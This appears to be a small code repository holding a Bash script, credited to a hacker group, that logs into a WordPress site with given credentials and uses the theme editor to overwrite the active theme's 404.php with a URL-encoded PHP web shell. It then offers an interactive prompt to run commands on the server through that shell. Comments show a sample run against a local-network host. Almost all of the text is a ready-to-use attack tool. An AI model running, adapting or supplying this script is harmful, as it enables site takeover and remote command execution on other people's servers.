├── README.md └── WpLoginAndUpload.sh /README.md: -------------------------------------------------------------------------------- 1 | # Simple-WP-Auto-Login-And-Shell-Upload -------------------------------------------------------------------------------- /WpLoginAndUpload.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # Wordpress Auto Login And Shell Upload 3 | # By Versailles / viloid 4 | # Sec7or Team | Surabaya Hacker Link 5 | 6 | # root@cans:~/wp# ./wp "http://192.168.100.8/wp" "admin" "cans21" 7 | # [?] Target : http://192.168.100.8/wp 8 | # [?] Username : admin 9 | # [?] Password : cans21 10 | 11 | # [!] Success Logged In! 12 | # [!] Theme Active : twentynineteen 13 | # [!] Try To Uploading WebShell...... 14 | # [+] Shell Uploaded >> http://192.168.100.8/wp/wp-content/themes/twentynineteen/404.php 15 | # [+] PHP Uname : Windows NT DESKTOP-OGAB21Q 10.0 build 17134 (Windows 10) i586 16 | # [?] Test Command Shell : hostname 17 | # [=] DESKTOP-OGAB21Q 18 | 19 | host=$1 20 | uname=$2 21 | pass=$3 22 | shell="%3C%3Fphp+if%28isset%28%24_REQUEST%5B0%5D%29%29%7Becho+%60%24_REQUEST%5B0%5D%60%3B%7Delse%7Becho+php_uname%28%29%3B%7D" 23 | 24 | echo "[?] Target : $1" 25 | echo "[?] Username : $2" 26 | echo "[?] Password : $3" 27 | echo "" 28 | 29 | login=$(curl -s --cookie wp.cookie --cookie-jar wp.cookie -d "log=$uname&pwd=$pass&wp-submit=Log+In&redirect_to=./wp-admin/&testcookie=1" ${host}/wp-login.php) 30 | 31 | if [[ -z $login ]]; then 32 | echo "[!] Success Logged In!" 33 | checktheme=$(curl -s --cookie wp.cookie --cookie-jar wp.cookie ${host}/wp-admin/themes.php) 34 | theme=$(echo $checktheme | grep -oP '(?<=theme=).*(?=&return=%2Fwp%2Fwp-admin%2Fthemes.php">Customize)') 35 | echo "[!] Theme Active : $theme" 36 | 37 | chk404=$(curl -s --cookie wp.cookie --cookie-jar wp.cookie ${host}/wp-admin/theme-editor.php?file=404.php&theme=${theme}) 38 | nonce=$(echo $chk404 | grep -oP '(?<="nonce" value=").*(?=")' | cut -d '"' -f1) 39 | 40 | echo "[!] Try To Uploading WebShell......" 41 | upload=$(curl -s --cookie wp.cookie --cookie-jar wp.cookie -d "nonce=${nonce}&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3D${theme}&newcontent=${shell}&action=edit-theme-plugin-file&file=404.php&theme=${theme}&docs-list=" ${host}/wp-admin/theme-editor.php) 42 | shell_loc="${host}/wp-content/themes/${theme}/404.php" 43 | checkshell=$(curl -s "$shell_loc") 44 | if [[ $checkshell =~ "Fatal error" ]]; then 45 | echo "[-] Failed Upload Shell" 46 | else 47 | echo "[+] Shell Uploaded >> $shell_loc" 48 | echo "[+] PHP Uname : `curl -s $shell_loc`" 49 | read -p "[?] Test Command Shell : " cmd 50 | testshell=$(curl -s $shell_loc -d "0=$cmd") 51 | echo "[=] $testshell" 52 | fi 53 | 54 | else 55 | echo "[!] Failed Log-In!" 56 | fi 57 | 58 | --------------------------------------------------------------------------------